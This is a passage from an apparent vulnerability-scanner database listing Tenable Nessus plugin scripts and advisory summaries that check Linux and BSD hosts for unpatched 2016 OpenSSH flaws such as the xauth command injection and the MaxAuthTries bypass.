if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-debugsource-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-fips-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-helpers-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-debugsource-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-helpers-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-debuginfo-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-debugsource-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-helpers-6.6p1-42.1")) flag++;
if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh");
}
NASL family: SuSE Local Security Checks
NASL id: OPENSUSE-2016-668.NASL
description: This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) These non-security issues were fixed : - Fix help output of sftp (bsc#945493) - Restarting openssh with openssh-fips installed was not working correctly (bsc#945484) - Fix crashes when /proc is not available in the chroot (bsc#947458) - Correctly parse GSSAPI KEX algorithms (bsc#961368) - More verbose FIPS mode/CC related documentation in README.FIPS (bsc#965576, bsc#960414) - Fix PRNG re-seeding (bsc#960414, bsc#729190) - Disable DH parameters under 2048 bits by default and allow lowering the limit back to the RFC 4419 specified minimum through an option (bsc#932483, bsc#948902) This update was imported from the SUSE:SLE-12:Update update project.
last seen: 2020-06-05
modified: 2016-06-01
plugin id: 91413
published: 2016-06-01
reporter: This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/91413
title: openSUSE Security Update : openssh (openSUSE-2016-668)
code:

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2016-668.
#
# The text description of this plugin is (C) SUSE LLC.
#

include("compat.inc");

if (description)
{
  script_id(91413);
  script_version("2.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");

  script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115");

  script_name(english:"openSUSE Security Update : openssh (openSUSE-2016-668)");
  script_summary(english:"Check for the openSUSE-2016-668 patch");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote openSUSE host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"This update for OpenSSH fixes three security issues.

These security issues were fixed :

  - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632)

  - CVE-2016-1908: Prevent X11 SECURITY circumvention when
    forwarding X11 connections (bsc#962313)

  - CVE-2015-8325: Ignore PAM environment when using login
    (bsc#975865)

These non-security issues were fixed :

  - Fix help output of sftp (bsc#945493)

  - Restarting openssh with openssh-fips installed was not
    working correctly (bsc#945484)

  - Fix crashes when /proc is not available in the chroot
    (bsc#947458)

  - Correctly parse GSSAPI KEX algorithms (bsc#961368)

  - More verbose FIPS mode/CC related documentation in
    README.FIPS (bsc#965576, bsc#960414)

  - Fix PRNG re-seeding (bsc#960414, bsc#729190)

  - Disable DH parameters under 2048 bits by default and
    allow lowering the limit back to the RFC 4419 specified
    minimum through an option (bsc#932483, bsc#948902)

This update was imported from the SUSE:SLE-12:Update update project."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=729190"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=932483"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=945484"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=945493"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=947458"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=948902"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=960414"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=961368"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=962313"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=965576"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=970632"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=975865"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected openssh packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-askpass-gnome");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-cavs");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-debugsource");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-fips");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-helpers");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.1");

  script_set_attribute(attribute:"patch_publication_date", value:"2016/05/31");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/01");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE42\.1)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.1", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);

flag = 0;

if ( rpm_check(release:"SUSE42.1", reference:"openssh-6.6p1-11.1") ) flag++;
if ( rpm_check(release:"SUSE42.1", reference:"openssh-askpass-gnome-6.6p1-11.1") ) flag++;
if ( rpm_check(release:"SUSE42.1", reference:"openssh-askpass-gnome-debuginfo-6.6p1-11.1") ) flag++;
if ( rpm_check(release:"SUSE42.1", reference:"openssh-cavs-6.6p1-11.1") ) flag++;
if ( rpm_check(release:"SUSE42.1", reference:"openssh-cavs-debuginfo-6.6p1-11.1") ) flag++;
if ( rpm_check(release:"SUSE42.1", reference:"openssh-debuginfo-6.6p1-11.1") ) flag++;
if ( rpm_check(release:"SUSE42.1", reference:"openssh-debugsource-6.6p1-11.1") ) flag++;
if ( rpm_check(release:"SUSE42.1", reference:"openssh-fips-6.6p1-11.1") ) flag++;
if ( rpm_check(release:"SUSE42.1", reference:"openssh-helpers-6.6p1-11.1") ) flag++;
if ( rpm_check(release:"SUSE42.1", reference:"openssh-helpers-debuginfo-6.6p1-11.1") ) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc");
}
NASL family: Red Hat Local Security Checks
NASL id: REDHAT-RHSA-2016-0466.NASL
description: Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 90079
published: 2016-03-22
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/90079
title: RHEL 6 : openssh (RHSA-2016:0466)
code:

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2016:0466. The text
# itself is copyright (C) Red Hat, Inc.
#

include("compat.inc");

if (description)
{
  script_id(90079);
  script_version("2.10");
  script_cvs_date("Date: 2019/10/24 15:35:41");

  script_cve_id("CVE-2015-5600", "CVE-2016-3115");
  script_xref(name:"RHSA", value:"2016:0466");

  script_name(english:"RHEL 6 : openssh (RHSA-2016:0466)");
  script_summary(english:"Checks the rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Red Hat host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Updated openssh packages that fix two security issues are now available
for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having Moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.

OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These
packages include the core files necessary for both the OpenSSH client
and server.

It was discovered that the OpenSSH server did not sanitize data received
in requests to enable X11 forwarding. An authenticated client with
restricted SSH access could possibly use this flaw to bypass intended
restrictions. (CVE-2016-3115)

It was discovered that the OpenSSH sshd daemon did not check the list of
keyboard-interactive authentication methods for duplicates. A remote
attacker could use this flaw to bypass the MaxAuthTries limit, making it
easier to perform password guessing attacks. (CVE-2015-5600)

All openssh users are advised to upgrade to these updated packages,
which contain backported patches to correct these issues. After
installing this update, the OpenSSH server daemon (sshd) will be
restarted automatically."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/errata/RHSA-2016:0466"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2015-5600"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2016-3115"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-askpass");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-clients");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-ldap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-server");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.7");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/08/02");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Red Hat Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x", "Red Hat " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);

yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo))
{
  rhsa = "RHSA-2016:0466";
  yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
  if (!empty_or_null(yum_report))
  {
    security_report_v4(
      port       : 0,
      severity   : SECURITY_HOLE,
      extra      : yum_report
    );
    exit(0);
  }
  else
  {
    audit_message = "affected by Red Hat security advisory " + rhsa;
    audit(AUDIT_OS_NOT, audit_message);
  }
}
else
{
  flag = 0;
  if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-clients-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-clients-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-clients-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", reference:"openssh-debuginfo-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++;
  if (rpm_check(release:"RHEL6", cpu:"x86_64",
reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", reference:"pam_ssh_agent_auth-0.9.3-114.el6_7")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-debuginfo / etc"); } }
NASL family Gentoo Local Security Checks
NASL id GENTOO_GLSA-201612-18.NASL
description The remote host is affected by the vulnerability described in GLSA-201612-18 (OpenSSH: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. Impact : Remote attackers could cause Denial of Service and conduct user enumeration. Workaround : There is no known workaround at this time.
last seen 2020-06-01
modified 2020-06-02
plugin id 95604
published 2016-12-07
reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/95604
title GLSA-201612-18 : OpenSSH: Multiple vulnerabilities
code

```
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 201612-18.
#
# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#

include("compat.inc");

if (description)
{
  script_id(95604);
  script_version("3.4");
  script_cvs_date("Date: 2019/04/11 17:23:06");

  script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115", "CVE-2016-6210", "CVE-2016-8858");
  script_xref(name:"GLSA", value:"201612-18");

  script_name(english:"GLSA-201612-18 : OpenSSH: Multiple vulnerabilities");
  script_summary(english:"Checks for updated package(s) in /var/db/pkg");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote Gentoo host is missing one or more security-related
patches."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The remote host is affected by the vulnerability described in GLSA-201612-18
(OpenSSH: Multiple vulnerabilities)

    Multiple vulnerabilities have been discovered in OpenSSH. Please review
      the CVE identifiers referenced below for details.

Impact :

    Remote attackers could cause Denial of Service and conduct user
      enumeration.

Workaround :

    There is no known workaround at this time."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security.gentoo.org/glsa/201612-18"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"All OpenSSH users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose '>=net-misc/openssh-7.3_p1-r7'"
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:openssh");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2016/12/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/07");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Gentoo Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (qpkg_check(package:"net-misc/openssh", unaffected:make_list("ge 7.3_p1-r7"), vulnerable:make_list("lt 7.3_p1-r7"))) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = qpkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "OpenSSH");
}
```
NASL family OracleVM Local Security Checks
NASL id ORACLEVM_OVMSA-2016-0070.NASL
description The remote OracleVM system is missing necessary patches to address critical security updates :
- CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (John Haxby) [orabug 22985024]
- CVE-2016-3115: missing sanitisation of input for X11 forwarding (John Haxby) [orabug 22985024]
last seen 2020-06-01
modified 2020-06-02
plugin id 91750
published 2016-06-22
reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/91750
title OracleVM 3.2 : openssh (OVMSA-2016-0070)

NASL family Ubuntu Local Security Checks
NASL id UBUNTU_USN-2966-1.NASL
description Shayan Sadigh discovered that OpenSSH incorrectly handled environment files when the UseLogin feature is enabled. A local attacker could use this issue to gain privileges. (CVE-2015-8325) Ben Hawkes discovered that OpenSSH incorrectly handled certain network traffic. A remote attacker could possibly use this issue to cause OpenSSH to crash, resulting in a denial of service. This issue only applied to Ubuntu 15.10. (CVE-2016-1907) Thomas Hoger discovered that OpenSSH incorrectly handled untrusted X11 forwarding when the SECURITY extension is disabled. A connection configured as being untrusted could get switched to trusted in certain scenarios, contrary to expectations. (CVE-2016-1908) It was discovered that OpenSSH incorrectly handled certain X11 forwarding data. A remote authenticated attacker could possibly use this issue to bypass certain intended command restrictions. (CVE-2016-3115). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen 2020-06-01
modified 2020-06-02
plugin id 91086
published 2016-05-12
reporter Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/91086
title Ubuntu 12.04 LTS / 14.04 LTS / 15.10 : openssh vulnerabilities (USN-2966-1)

NASL family Fedora Local Security Checks
NASL id FEDORA_2016-188267B485.NASL
description Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen 2020-06-05
modified 2016-04-27
plugin id 90726
published 2016-04-27
reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/90726
title Fedora 23 : gsi-openssh-7.2p2-1.fc23 (2016-188267b485)

NASL family Misc.
NASL id OPENSSH_72P2.NASL
description According to its banner, the version of OpenSSH running on the remote host is prior to 7.2p2. It is, therefore, affected by a security bypass vulnerability due to improper sanitization of X11 authentication credentials. An authenticated, remote attacker can exploit this, via crafted credentials, to inject arbitrary xauth commands, resulting in gaining read and write access to arbitrary files, connecting to local ports, or performing further attacks on xauth itself. Note that exploiting this vulnerability requires X11Forwarding to have been enabled.
last seen 2020-06-01
modified 2020-06-02
plugin id 90023
published 2016-03-18
reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/90023
title OpenSSH < 7.2p2 X11Forwarding xauth Command Injection

NASL family Scientific Linux Local Security Checks
NASL id SL_20160321_OPENSSH_ON_SL7_X.NASL
description It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically.
last seen 2020-03-18
modified 2016-03-22
plugin id 90081
published 2016-03-22
reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/90081
title Scientific Linux Security Update : openssh on SL7.x x86_64 (20160321)

NASL family Scientific Linux Local Security Checks
NASL id SL_20160321_OPENSSH_ON_SL6_X.NASL
description It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically.
last seen 2020-03-18
modified 2016-03-22
plugin id 90080
published 2016-03-22
reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/90080
title Scientific Linux Security Update : openssh on SL6.x i386/x86_64 (20160321)

NASL family FreeBSD Local Security Checks
NASL id FREEBSD_PKG_E4644DF8E7DA11E5829DC80AA9043978.NASL
description The OpenSSH project reports : Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth(1). Injection of xauth commands grants the ability to read arbitrary files under the authenticated user
last seen 2020-06-01
modified 2020-06-02
plugin id 89897
published 2016-03-14
reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/89897
title FreeBSD : openssh -- command injection when X11Forwarding is enabled (e4644df8-e7da-11e5-829d-c80aa9043978)

NASL family OracleVM Local Security Checks
NASL id ORACLEVM_OVMSA-2016-0038.NASL
description The remote OracleVM system is missing necessary patches to address critical security updates :
- CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (#1245969)
- CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317816)
- SSH2_MSG_DISCONNECT for user initiated disconnect follow RFC 4253 (#1222500)
- Add missing dot in ssh manual page (#1197763)
- Fix minor problems found by covscan/gcc (#1196063)
- Add missing options in man ssh (#1197763)
